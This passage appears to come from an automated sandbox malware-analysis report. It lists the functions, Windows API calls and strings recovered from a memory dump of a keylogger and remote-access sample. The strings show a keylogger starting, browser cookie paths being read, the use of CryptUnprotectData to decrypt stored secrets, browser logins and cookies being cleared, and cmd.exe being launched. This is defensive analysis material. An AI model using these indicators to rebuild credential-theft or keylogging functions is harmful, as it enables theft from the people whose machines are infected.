              • Instruction Fuzzy Hash: E9316271A0011956CB15FBA6D8969EE7375AB90308F40007FF206B71E2EF385D89CA99
              Function 0041C9E2 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
              Download Yara Rule
              APIs
              • SystemParametersInfoW.USER32 ref: 0041CAD7
                • Part of subcall function 0041376F: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
                • Part of subcall function 0041376F: RegSetValueExA.KERNEL32(?,004674B8,00000000,?,00000000,00000000), ref: 004137A6
                • Part of subcall function 0041376F: RegCloseKey.KERNEL32(?), ref: 004137B1
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: CloseCreateInfoParametersSystemValue
              • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
              • API String ID: 4127273184-3576401099
              • Opcode ID: 4f71dd23c4f760eabc23ec2adbc3392ecf1bb7076945bb966ce08e22b16a15c0
              • Instruction ID: 1197cbbb31bb874c57b9e92d70abebba424d259215afdbf251ae70ffa4d9d73d
              • Opcode Fuzzy Hash: 4f71dd23c4f760eabc23ec2adbc3392ecf1bb7076945bb966ce08e22b16a15c0
              • Instruction Fuzzy Hash: 7B1184B2BC021473D419313E5DABBBE28029743B51F94416BF6123A6C6E8DF0A8102CF
              Function 004162E4 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 79COMMON
              Download Yara Rule
              APIs
              • _wcslen.LIBCMT ref: 004162F5
                • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                • Part of subcall function 00413877: RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004), ref: 004138A0
                • Part of subcall function 00413877: RegCloseKey.KERNEL32(004660A4), ref: 004138AB
                • Part of subcall function 00409DE4: _wcslen.LIBCMT ref: 00409DFD
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: _wcslen$CloseCreateValue
              • String ID: !D@$okmode$PG
              • API String ID: 3411444782-3370592832
              • Opcode ID: 56d367afe2ba597d6a39c7afb1f52fa5ab03872d574dd40714d897b86eaaf0d3
              • Instruction ID: dff749dc984b923ba5de2327a6f3f9cc2e67bcaf748228c26ce3aec7d70e92d7
              • Opcode Fuzzy Hash: 56d367afe2ba597d6a39c7afb1f52fa5ab03872d574dd40714d897b86eaaf0d3
              • Instruction Fuzzy Hash: 10119371B442011ADB187B72D832ABD22969F94358F80443FF54AAF2E2DEBD4C51525D
              Function 0040C5EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 0040C4C3: PathFileExistsW.SHLWAPI(00000000), ref: 0040C4F6
              • PathFileExistsW.SHLWAPI(00000000), ref: 0040C61D
              • PathFileExistsW.SHLWAPI(00000000), ref: 0040C688
              Strings
              • User Data\Profile ?\Network\Cookies, xrefs: 0040C635
              • User Data\Default\Network\Cookies, xrefs: 0040C603
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: ExistsFilePath
              • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
              • API String ID: 1174141254-1980882731
              • Opcode ID: f3bc938036da248068b0be9c9c2ef6302554ca2f51a2acae7b142117e121394f
              • Instruction ID: e6b9b9a8142aca5ff9e4641a3ff80a721fb4b0471daa7637ae592fad8ebd6223
              • Opcode Fuzzy Hash: f3bc938036da248068b0be9c9c2ef6302554ca2f51a2acae7b142117e121394f
              • Instruction Fuzzy Hash: B421037190011996CB14F7A2DC96CEEB738EE50319F40053FB502B31D2EF789A46C698
              Function 0040C6BB Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 0040C526: PathFileExistsW.SHLWAPI(00000000), ref: 0040C559
              • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6EC
              • PathFileExistsW.SHLWAPI(00000000), ref: 0040C757
              Strings
              • User Data\Profile ?\Network\Cookies, xrefs: 0040C704
              • User Data\Default\Network\Cookies, xrefs: 0040C6D2
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: ExistsFilePath
              • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
              • API String ID: 1174141254-1980882731
              • Opcode ID: cddf59ed0f0a35ae698fc10c37901bb26126bcec9028eb75e0275fc853fc9b73
              • Instruction ID: 83f6a23093d6b0727a30a1d550f3d6f5bdb2bb72864fa742cd8a9fd6423befd9
              • Opcode Fuzzy Hash: cddf59ed0f0a35ae698fc10c37901bb26126bcec9028eb75e0275fc853fc9b73
              • Instruction Fuzzy Hash: AE21D37190011AD6CB05F7A2DC96CEEB778EE50719B50013FF502B31D2EF789A46C698
              Function 0040B164 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68timeCOMMON
              Download Yara Rule
              APIs
              • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
              • wsprintfW.USER32 ref: 0040B1F3
                • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: EventLocalTimewsprintf
              • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
              • API String ID: 1497725170-1359877963
              • Opcode ID: c8cd868dd362bd9616f6924cb695c27546a7cf7ec47136230a452d94a8988757
              • Instruction ID: 81b60f5d3581edaaac31e3e44e1e4f5c322996b2d8bf5e7d6f89c643b346fb92
              • Opcode Fuzzy Hash: c8cd868dd362bd9616f6924cb695c27546a7cf7ec47136230a452d94a8988757
              • Instruction Fuzzy Hash: 82117F72504118AACB18AB96EC558FE77BCEE48315B00012FF506A60E1FF7C9E46C6AC
              Function 0040AEEE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
              • CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0040AF6E
              • CreateThread.KERNEL32(00000000,00000000,Function_0000A289,?,00000000,00000000), ref: 0040AF7A
              • CreateThread.KERNEL32(00000000,00000000,0040A295,?,00000000,00000000), ref: 0040AF86
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: CreateThread$LocalTime$wsprintf
              • String ID: Online Keylogger Started
              • API String ID: 112202259-1258561607
              • Opcode ID: 958200284c2bea51d202cfda8ca6d09af1b0fae5d8a7627b3d8146febcef491d
              • Instruction ID: a86b307176fed80e65d2d8085b20e14cf0e56bf63d45b36b749a5edd9f3e52e0
              • Opcode Fuzzy Hash: 958200284c2bea51d202cfda8ca6d09af1b0fae5d8a7627b3d8146febcef491d
              • Instruction Fuzzy Hash: 1401C8A070031939E62076365C87D7F7A5DCA81398F40057FF645362C6D97D1C5586FB
              Function 00406A63 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON
              Download Yara Rule
              APIs
              • LoadLibraryA.KERNEL32(crypt32), ref: 00406A82
              • GetProcAddress.KERNEL32(00000000), ref: 00406A89
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: AddressLibraryLoadProc
              • String ID: CryptUnprotectData$crypt32
              • API String ID: 2574300362-2380590389
              • Opcode ID: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
              • Instruction ID: d796ed41fc96dc9ef8d801536240fab0e9422483ab40f89d2a564a4d0f07de08
              • Opcode Fuzzy Hash: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
              • Instruction Fuzzy Hash: 6201B535B00216ABCB18DFAD9D449ABBBB8EB49300F14817EE95AE3341D674D9008BA4
              Function 0040515C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON
              Download Yara Rule
              APIs
              • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
              • CloseHandle.KERNEL32(?), ref: 004051CA
              • SetEvent.KERNEL32(?), ref: 004051D9
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: CloseEventHandleObjectSingleWait
              • String ID: Connection Timeout
              • API String ID: 2055531096-499159329
              • Opcode ID: 0fd579d592e0ec80786bd468370273e6dda72da4d01b044bfcfe4f18e9b09a20
              • Instruction ID: e4880b57ed2806ada623013920947221b56867654f576af2420d72dde76e11cf
              • Opcode Fuzzy Hash: 0fd579d592e0ec80786bd468370273e6dda72da4d01b044bfcfe4f18e9b09a20
              • Instruction Fuzzy Hash: 1201D831A40F40AFE7257B368D9552BBBE0FF01302704097FE68396AE2D6789800CF59
              Function 0040E7C5 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
              Download Yara Rule
              APIs
              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E833
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Exception@8Throw
              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
              • API String ID: 2005118841-1866435925
              • Opcode ID: 14b47bc0c01e13b5246ea87e39f47a408aa5ce0847750dcdb3cc0488a1de7433
              • Instruction ID: aca7d9cae529c24a85643cb8f0975e7fdd15ab88b82278639a3f13e82648cb6f
              • Opcode Fuzzy Hash: 14b47bc0c01e13b5246ea87e39f47a408aa5ce0847750dcdb3cc0488a1de7433
              • Instruction Fuzzy Hash: 2C01B1315443086AE618F693C843FAA73585B10708F108C2FAA15761C2F67D6961C66B
              Function 00413814 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON
              Download Yara Rule
              APIs
              • RegCreateKeyW.ADVAPI32(80000001,00000000,004752D8), ref: 0041381F
              • RegSetValueExW.ADVAPI32 ref: 0041384D
              • RegCloseKey.ADVAPI32(004752D8), ref: 00413858
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: CloseCreateValue
              • String ID: pth_unenc
              • API String ID: 1818849710-4028850238
              • Opcode ID: 0de8c57798d2a052ed48f9ba6d58c7c81afdedd1aa2e5c5a2a8de63742f16a74
              • Instruction ID: 91b44a8789fefabe47d0aed0b401f4e945a8dec35bb1902c17c37083bf943f80
              • Opcode Fuzzy Hash: 0de8c57798d2a052ed48f9ba6d58c7c81afdedd1aa2e5c5a2a8de63742f16a74
              • Instruction Fuzzy Hash: 83F0C271440218FBDF10AFA1EC45FEE376CEF00B56F10452AF905A61A1E7359F04DA94
              Function 0040DFA6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
              Download Yara Rule
              APIs
              • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFB1
              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040DFF0
                • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 0043565F
                • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 00435683
              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E016
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
              • String ID: bad locale name
              • API String ID: 3628047217-1405518554
              • Opcode ID: 86f49e18a429e1939de4d1535c8c5fe7fe9a78163a93b43351c768af92284890
              • Instruction ID: c9d4814c50014869750c7e26a4e1a69426a580a77e14145940ab7c7d7e24a8db
              • Opcode Fuzzy Hash: 86f49e18a429e1939de4d1535c8c5fe7fe9a78163a93b43351c768af92284890
              • Instruction Fuzzy Hash: EAF081314006049AC634FA62D863B9AB7B89F14718F504A7FB906228D1EF7CBA1CCA4C
              Function 00416C2D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33threadCOMMON
              Download Yara Rule
              APIs
              • CreateThread.KERNEL32(00000000,00000000,Function_0001D45D,00000000,00000000,00000000), ref: 00416C47
              • ShowWindow.USER32(00000009), ref: 00416C61
              • SetForegroundWindow.USER32 ref: 00416C6D
                • Part of subcall function 0041CD9B: AllocConsole.KERNEL32 ref: 0041CDA4
                • Part of subcall function 0041CD9B: ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                • Part of subcall function 0041CD9B: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Window$ConsoleShow$AllocCreateForegroundOutputThread
              • String ID: !D@
              • API String ID: 3446828153-604454484
              • Opcode ID: b7364eaafb7a437eec89ed9fb4143899ef50b32a2d873a0c8232afd7958e43d5
              • Instruction ID: c1d0571eb829819ca76672189d51ce116019f2d3a91c4b5ec781e9fa27a10d2f
              • Opcode Fuzzy Hash: b7364eaafb7a437eec89ed9fb4143899ef50b32a2d873a0c8232afd7958e43d5
              • Instruction Fuzzy Hash: 9EF05E70158201EAD720AB62EC45AFA7B69EB54351F00483BF849D14F2DB398C85C69D
              Function 004160EE Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
              Download Yara Rule
              APIs
              • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00416130
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: ExecuteShell
              • String ID: /C $cmd.exe$open
              • API String ID: 587946157-3896048727
              • Opcode ID: 64774f0173dd2414335a6a01ca4130183aa4f4d30cf83fc1238f67c292a9c67a
              • Instruction ID: 0a18f3537a1213b4b5dca9b82f73c842755a7e35c30cee8a650de64661b344da
              • Opcode Fuzzy Hash: 64774f0173dd2414335a6a01ca4130183aa4f4d30cf83fc1238f67c292a9c67a
              • Instruction Fuzzy Hash: 0DE0C0B0208345AAC705E775CC95CBF73ADAA94749B50483F7142A20E2EF7C9D49C659
              Function 0040B8AC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20threadCOMMON
              Download Yara Rule
              APIs
              • TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
              • UnhookWindowsHookEx.USER32 ref: 0040B8C7
              • TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: TerminateThread$HookUnhookWindows
              • String ID: pth_unenc
              • API String ID: 3123878439-4028850238
              • Opcode ID: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
              • Instruction ID: 1c21f009177841ea8acfe7f5b61a435624369701cc7e40c150536a334dec3301
              • Opcode Fuzzy Hash: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
              • Instruction Fuzzy Hash: 4AE01272205356EFD7241FA09C988267BEEDA0478A324487EF2C3626B1CA794C10CB5D
              Function 0040140A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
              Download Yara Rule
              APIs
              • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
              • GetProcAddress.KERNEL32(00000000), ref: 0040141B
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: AddressHandleModuleProc
              • String ID: GetCursorInfo$User32.dll
              • API String ID: 1646373207-2714051624
              • Opcode ID: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
              • Instruction ID: 65f79b4a2c2aed896b4012a4b0ac893fb7d0ccba54e760513c8834f3bef68171
              • Opcode Fuzzy Hash: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
              • Instruction Fuzzy Hash: B4B09B70541740E7CB106BF45C4F9153555B514703B105476B44996151D7B44400C61E
              Function 004014AF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
              Download Yara Rule
              APIs
              • LoadLibraryA.KERNEL32(User32.dll), ref: 004014B9
              • GetProcAddress.KERNEL32(00000000), ref: 004014C0
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: AddressLibraryLoadProc
              • String ID: GetLastInputInfo$User32.dll
              • API String ID: 2574300362-1519888992
              • Opcode ID: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
              • Instruction ID: ea73ef4d1088e939c140d9431744cb36a9dcab52d5ea7f3e4bb33043e5d41cbe
              • Opcode Fuzzy Hash: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
              • Instruction Fuzzy Hash: 5EB092B45C1700FBCB106FA4AC4E9293AA9A614703B1088ABB845D2162EBB884008F9F
              Function 0044A004 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: __alldvrm$_strrchr
              • String ID:
              • API String ID: 1036877536-0
              • Opcode ID: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
              • Instruction ID: 0200e234d7a66e392568480c50467de0d06b46efb2a76a7ba0b74d69ca9a70f2
              • Opcode Fuzzy Hash: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
              • Instruction Fuzzy Hash: 57A166319843869FFB21CF58C8817AEBBA1FF25304F1441AFE9859B382C27D8951C75A
              Function 00442801 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
              • Instruction ID: 497cf8d2f4a88fd96e7f98feeb1d24cd381d204b534fd1f3fd6e485e43360072
              • Opcode Fuzzy Hash: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
              • Instruction Fuzzy Hash: EA413871A00704BFF324AF79CD41B5EBBA9EB88710F10862FF105DB681E7B999418788
              Function 0040C00C Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
              Download Yara Rule
              APIs
              Strings
              • [Cleared browsers logins and cookies.], xrefs: 0040C0E4
              • Cleared browsers logins and cookies., xrefs: 0040C0F5
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Sleep
              • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
              • API String ID: 3472027048-1236744412
              • Opcode ID: f04c9fcfc5d51e830be94f028420677c48269f78a09cd2570410497d2b162b15
              • Instruction ID: fac43f66edf0589ccdcbb227709f1a337e776f7542e83b73a027453bfa593f46
              • Opcode Fuzzy Hash: f04c9fcfc5d51e830be94f028420677c48269f78a09cd2570410497d2b162b15
              • Instruction Fuzzy Hash: 2531C804348380E9D6116BF554567AB7B814E93744F08457FB9C42B3D3D97E4848C7AF
              Function 0040A529 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 0041C551: GetForegroundWindow.USER32 ref: 0041C561
                • Part of subcall function 0041C551: GetWindowTextLengthW.USER32 ref: 0041C56A
                • Part of subcall function 0041C551: GetWindowTextW.USER32 ref: 0041C594
              • Sleep.KERNEL32(000001F4), ref: 0040A573
              • Sleep.KERNEL32(00000064), ref: 0040A5FD
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Window$SleepText$ForegroundLength
              • String ID: [ $ ]
              • API String ID: 3309952895-93608704
              • Opcode ID: 31279ddc9ac779b407beafc78fb4a7c612abc736342ec11431a77cc1334fcb89
              • Instruction ID: 97bd403738d1ca0cb59e80c1fc79ee6201ed0cb329172f4776a94889a39aca56
              • Opcode Fuzzy Hash: 31279ddc9ac779b407beafc78fb4a7c612abc736342ec11431a77cc1334fcb89
              • Instruction Fuzzy Hash: FE119F315043006BC614BB65CC5399F77A8AF50308F40053FF552665E2FF79AA5886DB
              Function 00443A33 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
              • Instruction ID: 17f232e73e96fb976a24982deb7d35e81c220cd9520ca4ef7e8dcf180de91df6
              • Opcode Fuzzy Hash: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
              • Instruction Fuzzy Hash: 1301F2B36497067EFA202E786CC1F67220CDF41BBEB34032BB574712D1DA68CE404568
              Function 00443AB2 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
              • Instruction ID: 34d970f17befced98e3ca294e9c9a609e5e7bfbb0444a55afbb34e25ce639c56
              • Opcode Fuzzy Hash: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
              • Instruction Fuzzy Hash: 0601A2B26096117EFA111E796CC4E27624CDB81BBF325032BF535612D6DA688E014169
              Function 0041C485 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
              Download Yara Rule
              APIs
              • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
              • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C4B2
              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C4D7
              • CloseHandle.KERNEL32(00000000), ref: 0041C4E5
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: File$CloseCreateHandleReadSize
              • String ID:
              • API String ID: 3919263394-0
              • Opcode ID: 3271d486463dfc93c477f1e2c7ad2cd28a4a76e92964f49fc02a4406d9477efd
              • Instruction ID: d938e931a51b81dfe9e25773ede9364464a286a3a3b97e7b856b7b87d8bf29b3
              • Opcode Fuzzy Hash: 3271d486463dfc93c477f1e2c7ad2cd28a4a76e92964f49fc02a4406d9477efd
              • Instruction Fuzzy Hash: 0FF0C2B1245308BFE6101B25ACD4EBB375CEB867A9F00053EF902A22C1CA298C05913A
              Function 0041C1DD Relevance: 6.0, APIs: 4, Instructions: 48COMMON
              Download Yara Rule
              APIs
              • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
              • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
              • CloseHandle.KERNEL32(00000000), ref: 0041C233
              • CloseHandle.KERNEL32(00000000), ref: 0041C23B
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: CloseHandleOpenProcess
              • String ID:
              • API String ID: 39102293-0
              • Opcode ID: 449f4402ebb840a84195bd3231048093a1951801f3bdb5f0a33f363ac88d28a1
              • Instruction ID: 502f13a9e38f74389cb09c542eced9ec4ef47df168bad581006c654e14f0d55b
              • Opcode Fuzzy Hash: 449f4402ebb840a84195bd3231048093a1951801f3bdb5f0a33f363ac88d28a1
              • Instruction Fuzzy Hash: 53012BB1680315ABD61057D49C89FB7B27CDB84796F0000A7FA04D21D2EF748C818679
              Function 00439863 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • ___BuildCatchObject.LIBVCRUNTIME ref: 0043987A
                • Part of subcall function 00439EB2: ___AdjustPointer.LIBCMT ref: 00439EFC
              • _UnwindNestedFrames.LIBCMT ref: 00439891
              • ___FrameUnwindToState.LIBVCRUNTIME ref: 004398A3
              • CallCatchBlock.LIBVCRUNTIME ref: 004398C7
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
              • String ID:
              • API String ID: 2633735394-0
              • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
              • Instruction ID: dcee73c62e3621a690853eebe59cad03ae51e1002f288686f44977c5109bb855
              • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
